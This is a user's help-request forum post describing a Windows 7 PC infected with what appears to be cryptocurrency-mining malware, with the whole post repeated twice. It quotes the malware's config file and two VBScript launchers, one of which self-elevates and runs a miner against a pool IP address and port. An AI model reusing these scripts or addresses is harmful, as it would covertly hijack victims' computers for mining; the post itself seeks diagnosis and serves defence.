The machine in question is a Dell 8300, core i7 chip, running Windows-7x64 and had Norton Internet Security on it.
My internet IS working in my house. I have a number of wired and wireless connections, all working. 1 computer had an issue with an .exe that was taking about 50 % of CPU cycles. The problem executable was:
C:\Users\Steven\AppData\Roaming\Microsoft\Crypto\xRAVClp.exe
There was also another .txt file in that folder called: x5r7TQa.txt
The contents of the text file is:
add:193.107.16.57
dum:AKDTDDtx7krDmrtgSq4A7Lv3V8iqvw9cdY
por:2657
ver:6
gen:4
don:5
There are also 2 .vbs files in the folder:
srsx.vbs which contains the following:
If WScript.Arguments.length = 0 Then
Set objShell = CreateObject("Shell.Application")
objShell.ShellExecute "wscript.exe", Chr(34) & _
WScript.ScriptFullName & Chr(34) & " Microsoft Server Runtime ", "", "runas", 1
WScript.Quit
Else
Set objSh = CreateObject("Wscript.Shell")
objSh.Run "C:\Users\Steven\AppData\Roaming\Microsoft\Crypto\srsx.exe -o http://194.63.141.76:10034 -u mumus575.xpm_16 -p x", 0
End If
and xRAVCp.vbs which contains:
Set objSh = CreateObject("Wscript.Shell")
objSh.Run "C:\Users\Steven\AppData\Roaming\Microsoft\Crypto\xRAVCp.exe -pooluser=AQXUSoBLto8s85nQJdFDC4yUqaCzbjKp8b -poolip=194.63.141.76 -poolport=1337 -genproclimit=4 -poolfee=2", 0
So clearly, these are related to the problem .exe file. ALso of note, all of my other Win7x64 machines have 0 files in folder C:\Users\Whoever\AppData\Roaming\Microsoft\Crypto\
and only an RSA folder in there. I have uploaded 2 .jpgs showing the filenames in the folder before and currently.
If we killed the running app in Task Manager, everything is fine. Upon reboot, the file gets run again (after a couple of minutes) and the CPU usage goes WAY UP. So we killed the 2 files from the file system and rebooted. They get re-created and same problem occurs.
So we called NORTON and they remote in and right after she asks if she can delete those files, I say yes, but they come back after reboot. The system gets rebooted (I THINK by her) and when we reboot, we have no internet connection. Actually, windows THINKS its connected (and I can ping) but IE cannot display any web page. I get on a second (identical) machine and connect back to Norton in the chat window and we end up removing ALL of Norton Internet security, but still no luck. Interestingly enough, Windows prompts me (on the 'bad' machine) to load Windows Defender for some protection. Windows defender WAS able to get out and get files and install. Finally, thinking its my browser has been hosed, I download the FULL install of Chrome on the 2nd machine, bring it over, and it seems to load but immediately tries to connect to the internet and fails.
So, I'd like to get the internet up first, as we can't do much of anything on this machine without it.
Current status of the machine:
1. When we reboot, we get a message "THXAudio has stopped working" (and windows searches for a bit for a solution, then closes the window).
2. We get a number of beeps (2 or 3??) similar to what you get when you remove a USB thumb drive.
3. We have no connectivity through IE or any other program (i.e., Steam) that accesses the internet, although Windows defender seemed to get files.
4. The CPU hog program is still on the file system, but does not seem to be running anymore.
I am going to appeal to the Sherlock Holmes types out there and hope you can help me solve this mystery.
I'd REALLY appreciate it. (If nothing else, just telling me what the vbscript files are doing would be great).
Thanks,
Rob
My internet IS working in my house. I have a number of wired and wireless connections, all working. 1 computer had an issue with an .exe that was taking about 50 % of CPU cycles. The problem executable was:
C:\Users\Steven\AppData\Roaming\Microsoft\Crypto\xRAVClp.exe
There was also another .txt file in that folder called: x5r7TQa.txt
The contents of the text file is:
add:193.107.16.57
dum:AKDTDDtx7krDmrtgSq4A7Lv3V8iqvw9cdY
por:2657
ver:6
gen:4
don:5
There are also 2 .vbs files in the folder:
srsx.vbs which contains the following:
If WScript.Arguments.length = 0 Then
Set objShell = CreateObject("Shell.Application")
objShell.ShellExecute "wscript.exe", Chr(34) & _
WScript.ScriptFullName & Chr(34) & " Microsoft Server Runtime ", "", "runas", 1
WScript.Quit
Else
Set objSh = CreateObject("Wscript.Shell")
objSh.Run "C:\Users\Steven\AppData\Roaming\Microsoft\Crypto\srsx.exe -o http://194.63.141.76:10034 -u mumus575.xpm_16 -p x", 0
End If
and xRAVCp.vbs which contains:
Set objSh = CreateObject("Wscript.Shell")
objSh.Run "C:\Users\Steven\AppData\Roaming\Microsoft\Crypto\xRAVCp.exe -pooluser=AQXUSoBLto8s85nQJdFDC4yUqaCzbjKp8b -poolip=194.63.141.76 -poolport=1337 -genproclimit=4 -poolfee=2", 0
So clearly, these are related to the problem .exe file. ALso of note, all of my other Win7x64 machines have 0 files in folder C:\Users\Whoever\AppData\Roaming\Microsoft\Crypto\
and only an RSA folder in there. I have uploaded 2 .jpgs showing the filenames in the folder before and currently.
If we killed the running app in Task Manager, everything is fine. Upon reboot, the file gets run again (after a couple of minutes) and the CPU usage goes WAY UP. So we killed the 2 files from the file system and rebooted. They get re-created and same problem occurs.
So we called NORTON and they remote in and right after she asks if she can delete those files, I say yes, but they come back after reboot. The system gets rebooted (I THINK by her) and when we reboot, we have no internet connection. Actually, windows THINKS its connected (and I can ping) but IE cannot display any web page. I get on a second (identical) machine and connect back to Norton in the chat window and we end up removing ALL of Norton Internet security, but still no luck. Interestingly enough, Windows prompts me (on the 'bad' machine) to load Windows Defender for some protection. Windows defender WAS able to get out and get files and install. Finally, thinking its my browser has been hosed, I download the FULL install of Chrome on the 2nd machine, bring it over, and it seems to load but immediately tries to connect to the internet and fails.
So, I'd like to get the internet up first, as we can't do much of anything on this machine without it.
Current status of the machine:
1. When we reboot, we get a message "THXAudio has stopped working" (and windows searches for a bit for a solution, then closes the window).
2. We get a number of beeps (2 or 3??) similar to what you get when you remove a USB thumb drive.
3. We have no connectivity through IE or any other program (i.e., Steam) that accesses the internet, although Windows defender seemed to get files.
4. The CPU hog program is still on the file system, but does not seem to be running anymore.
I am going to appeal to the Sherlock Holmes types out there and hope you can help me solve this mystery.
I'd REALLY appreciate it. (If nothing else, just telling me what the vbscript files are doing would be great).
Thanks,
Rob
